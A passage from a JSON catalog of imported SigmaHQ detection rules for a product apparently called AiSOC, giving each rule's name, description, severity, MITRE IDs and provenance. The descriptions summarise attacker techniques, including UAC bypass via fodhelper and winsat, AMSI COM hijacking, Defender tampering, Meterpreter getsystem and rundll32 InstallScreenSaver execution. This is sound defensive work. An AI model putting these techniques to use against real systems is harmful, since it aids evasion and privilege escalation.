"rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml" } }, { "id": "sigmahq-sigma-145095eb-e273-443b-83d0-f9b519b7867b", "type": "detection", "name": "PDF File Created By RegEdit.EXE", "description": "Detects the creation of a file with the \".pdf\" extension by the \"RegEdit.exe\" process.\nThis indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pdf-file-created-by-regedit-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "145095eb-e273-443b-83d0-f9b519b7867b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_regedit_print_as_pdf.yml" } }, { "id": "sigmahq-sigma-145322e4-0fd3-486b-81ca-9addc75736d8", "type": "detection", "name": "Use of UltraVNC Remote Access Software", "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-ultravnc-remote-access-software.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "145322e4-0fd3-486b-81ca-9addc75736d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ultravnc.yml" } }, { "id": "sigmahq-sigma-146aace8-9bd6-42ba-be7a-0070d8027b76", "type": "detection", "name": "Potentially Suspicious Child Process Of WinRAR.EXE", "description": "Detects potentially suspicious child processes of WinRAR.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-winrar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "146aace8-9bd6-42ba-be7a-0070d8027b76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml" } }, { "id": "sigmahq-sigma-14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "type": "detection", "name": "Okta User Account Locked Out", "description": "Detects when an user account is locked out.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-user-account-locked-out.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_user_account_locked_out.yml" } }, { "id": "sigmahq-sigma-148431ce-4b70-403d-8525-fcc2993f29ea", "type": "detection", "name": "Potential DLL Injection Or Execution Using Tracker.exe", "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-injection-or-execution-using-tracker-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "148431ce-4b70-403d-8525-fcc2993f29ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml" } }, { "id": "sigmahq-sigma-14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml" } }, { "id": "sigmahq-sigma-14c71865-6cd3-44ae-adaa-1db923fae5f2", "type": "detection", "name": "Tamper Windows Defender - ScriptBlockLogging", "description": "Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-scriptblocklogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" } }, { "id": "sigmahq-sigma-14f3f1c8-02d5-43a2-a191-91ffb52d3015", "type": "detection", "name": "RDS Database Security Group Modification", "description": "Detects changes to the security group entries for RDS databases.\nThis can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rds-database-security-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14f3f1c8-02d5-43a2-a191-91ffb52d3015", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml" } }, { "id": "sigmahq-sigma-152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "type": "detection", "name": "Shell Open Registry Keys Manipulation", "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-open-registry-keys-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" } }, { "id": "sigmahq-sigma-15434e33-5027-4914-88d5-3d4145ec25a9", "type": "detection", "name": "Potential Product Reconnaissance Via Wmic.EXE", "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-product-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15434e33-5027-4914-88d5-3d4145ec25a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml" } }, { "id": "sigmahq-sigma-1543ae20-cbdf-4ec1-8d12-7664d667a825", "type": "detection", "name": "Suspicious Commands Linux", "description": "Detects relevant commands often related to malware or hacking activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-commands-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1543ae20-cbdf-4ec1-8d12-7664d667a825", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_susp_cmds.yml" } }, { "id": "sigmahq-sigma-1547e27c-3974-43e2-a7d7-7f484fb928ec", "type": "detection", "name": "Registry Persistence via Service in Safe Mode", "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-persistence-via-service-in-safe-mode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" } }, { "id": "sigmahq-sigma-155c7fd5-47b4-49b2-bbeb-eb4fab335429", "type": "detection", "name": "Add Windows Capability Via PowerShell Script", "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-windows-capability-via-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" } }, { "id": "sigmahq-sigma-155dbf56-e0a4-4dd0-8905-8a98705045e8", "type": "detection", "name": "UAC Bypass Abusing Winsat Path Parsing - File", "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-abusing-winsat-path-parsing-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" } }, { "id": "sigmahq-sigma-15619216-e993-4721-b590-4c520615a67d", "type": "detection", "name": "Potential Meterpreter/CobaltStrike Activity", "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-meterpreter-cobaltstrike-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15619216-e993-4721-b590-4c520615a67d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml" } }, { "id": "sigmahq-sigma-15904280-565c-4b73-9303-3291f964e7f9", "type": "detection", "name": "Potential Persistence Attempt Via ErrorHandler.Cmd", "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-attempt-via-errorhandler-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15904280-565c-4b73-9303-3291f964e7f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml" } }, { "id": "sigmahq-sigma-15b75071-74cc-47e0-b4c6-b43744a62a2b", "type": "detection", "name": "Suspicious Process Start Locations", "description": "Detects suspicious process run from unusual locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-start-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml" } }, { "id": "sigmahq-sigma-15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "type": "detection", "name": "Rundll32 InstallScreenSaver Execution", "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-installscreensaver-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml" } }, { "id": "sigmahq-sigma-15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "type": "detection", "name": "Malicious PE Execution by Microsoft Visual Studio Debugger", "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-pe-execution-by-microsoft-visual-studio-debugger.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" } }, { "id": "sigmahq-sigma-15ef3fac-f0f0-4dc4-ada0-660aa72980b3", "type": "detection", "name": "Azure Virtual Network Device Modified or Deleted", "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-virtual-network-device-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-160d2780-31f7-4922-8b3a-efce30e63e96", "type": "detection", "name": "Potential AMSI COM Server Hijacking", "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-com-server-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "160d2780-31f7-4922-8b3a-efce30e63e96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" } }, { "id": "sigmahq-sigma-16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "type": "detection", "name": "AWS EC2 Disable EBS Encryption", "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1486", "T1565" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/cloud/aws-ec2-disable-ebs-encryption.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml" } }, { "id": "sigmahq-sigma-162ab1e4-6874-4564-853c-53ec3ab8be01", "type": "detection", "name": "TeamViewer Remote Session", "description": "Detects the creation of log files during a TeamViewer remote session", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/teamviewer-remote-session.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" } }, { "id": "sigmahq-sigma-162e69a7-7981-4344-84a9-0f1c9a217a52", "type": "detection", "name": "Powershell Directory Enumeration", "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-directory-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "162e69a7-7981-4344-84a9-0f1c9a217a52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" } }, { "id": "sigmahq-sigma-164eda96-11b2-430b-85ff-6a265c15bf32", "type": "detection", "name": "Local Groups Reconnaissance Via Wmic.EXE", "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-groups-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "164eda96-11b2-430b-85ff-6a265c15bf32", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml" } }, { "id": "sigmahq-sigma-1667a172-ed4c-463c-9969-efd92195319a", "type": "detection", "name": "Okta Policy Modified or Deleted", "description": "Detects when an Okta policy is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-policy-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1667a172-ed4c-463c-9969-efd92195319a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_policy_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-166e9c50-8cd9-44af-815d-d1f0c0e90dde", "type": "detection", "name": "Suspicious Svchost Process Access", "description": "Detects suspicious access to the \"svchost\" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-svchost-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml" } }, { "id": "sigmahq-sigma-16905e21-66ee-42fe-b256-1318ada2d770", "type": "detection", "name": "Start of NT Virtual DOS Machine", "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/start-of-nt-virtual-dos-machine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16905e21-66ee-42fe-b256-1318ada2d770", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" } }, { "id": "sigmahq-sigma-16a71777-0b2e-4db7-9888-9d59cb75200b", "type": "detection", "name": "Github Delete Action Invoked", "description": "Detects delete action in the Github audit logs for codespaces, environment, project and repo.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-delete-action-invoked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16a71777-0b2e-4db7-9888-9d59cb75200b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_delete_action_invoked.yml" } }, { "id": "sigmahq-sigma-16ab6143-510a-44e2-a615-bdb80b8317fc", "type": "detection", "name": "Bitbucket Global SSH Settings Changed", "description": "Detects Bitbucket global SSH access configuration changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-global-ssh-settings-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16ab6143-510a-44e2-a615-bdb80b8317fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml" } }, { "id": "sigmahq-sigma-16b37b70-6fcf-4814-a092-c36bd3aafcbd", "type": "detection", "name": "PowerShell ShellCode", "description": "Detects Base64 encoded Shellcode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 